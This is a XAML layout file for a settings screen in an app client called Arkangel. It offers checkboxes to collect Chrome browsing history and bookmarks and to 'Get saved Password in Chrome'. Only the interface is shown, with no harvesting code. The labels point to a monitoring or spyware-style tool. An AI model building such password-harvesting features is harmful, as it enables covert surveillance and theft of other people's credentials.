Source code app client/Arkangel/Website_Usage.xaml

<UserControl x:Class="Arkangel.Website_Usage"
             xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
             xmlns:local="clr-namespace:Arkangel"
             mc:Ignorable="d" 
             d:DesignHeight="430" d:DesignWidth="759"
             xmlns:materialDesign="http://materialdesigninxaml.net/winfx/xaml/themes"
    xmlns:dragablz="http://dragablz.net/winfx/xaml/dragablz"
    TextElement.Foreground="{DynamicResource MaterialDesignBody}"
     TextElement.FontWeight="Regular"
     TextElement.FontSize="13"
     TextOptions.TextFormattingMode="Ideal"
     TextOptions.TextRenderingMode="Auto"
     Background="{DynamicResource MaterialDesignPaper}"
     FontFamily="{DynamicResource MaterialDesignFont}">
    <Grid>
        <StackPanel Margin="0" Background="#F2F2F2">
            <Grid Height="53">
                <StackPanel Orientation="Horizontal" VerticalAlignment="Top" Margin="0" Background="#0489B1">
                    <Button Uid="0" Width="150" Content="Website Usage" Height="53" Background="{x:Null}" BorderBrush="{x:Null}" Foreground="White" FontSize="17"/>
                </StackPanel>
                <Grid x:Name="GridCursor" Width="150" Height="5" Background="#DBA901" HorizontalAlignment="Left" Margin="0" VerticalAlignment="Bottom"/>
            </Grid>

            <Grid x:Name="GridMain" Height="356" Margin="10,16,10,0" Background="#F2F2F2">
                <StackPanel>
                    <GroupBox Header="Enable/Disable" Height="120" materialDesign:ColorZoneAssist.Mode="Light">
                        <StackPanel VerticalAlignment="Center">
                            <CheckBox x:Name="cb_enable" Content="Enable get History from Chrome" Height="50" FontSize="25"></CheckBox>
                        </StackPanel>
                    </GroupBox>
                    <GroupBox Header="More Setting" materialDesign:ColorZoneAssist.Mode="Light">
                        <StackPanel>
                            <CheckBox x:Name="cb_bookmark" Content="Get bookmark in Chrome" Height="50" FontSize="25"></CheckBox>
                            <CheckBox x:Name="cb_password" Content="Get saved Password in Chrome" Height="50" FontSize="25"></CheckBox>
                        </StackPanel>
                    </GroupBox>
                </StackPanel>
                <Button x:Name="bt_OK" Width="150" Margin="567,299,10,25" Click="bt_OK_Click">OK</Button>
            </Grid>
        </StackPanel>
    </Grid>
</UserControl>
